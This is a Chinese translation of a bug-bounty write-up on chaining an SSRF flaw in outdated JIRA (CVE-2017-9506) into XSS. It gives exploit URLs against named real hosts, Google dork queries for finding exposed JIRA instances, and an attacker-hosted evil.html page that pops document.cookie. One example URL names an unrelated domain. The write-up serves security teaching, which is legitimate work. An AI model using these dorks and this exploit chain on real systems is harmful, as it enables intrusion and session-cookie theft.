第五篇翻译：SSRF to XSS

原文：How Outdated JIRA Instances suffers from multiple security vulnerabilities?

漏洞：SSRF + XSS

作者：Yeasir Arafat

难度：低

  我正在测试一个名为visma的公共BUG赏金计划，像往常一样，我先收集了它的一些子域名。很少有子域能引起我的关注，但是下面列出的运行jira服务的子域成功吸引了我的注意

https://jira.brown.edu/plugins/servlet/oauth/users/icon-uri?consumerUri=http://www.baidu.com

如果你想找一些运行jira服务的子域练练手，可以试试使用下面的谷歌语法

inurl:visma intitle:JIRA login
inurl:companyname intitle:JIRA login

  我注意到域名https://customer-incident.consulting.visma.com 具有JIRA 6.3.1版本。我记得CVE-2017-9506 影响范围是Jira versions < 7.3.5，所以我尝试验证一下该网站是否具有SSRF漏洞

https://customer-incident.consulting.visma.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com

  我尝试获取一些网站内部数据或获取读取权限，但是我失败了。 如果你想用脚本自动测试网站是否存在jira漏洞，我建议你使用Github上的exp工具Jira-Scan

  另外，我还创建了一个简单的HTML页面，上面包含了XSS漏洞。我将重定向页面指定到我的XSS漏洞页面，这样我们就能够触发XSS，并且获取到https://customer-incident.consulting.visma.com 网站的用户cookie，而不是百度的cookie

[*]攻击者创建的evil.html

<html>
<head>
<title>SSRF to XSS on Jira Vulnerable Instances</title>
</head>
<body>
  <script>
   alert( document.domain + " is vulnerable" );
            alert( document.cookie);
</script>
</body>
</html>

  现在访问我们自己在VPS上搭建的XSS漏洞网页，验证能否触发XSS并获取Cookie

https://customer-incident.consulting.visma.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://VPSIP/evil.html

打赏译者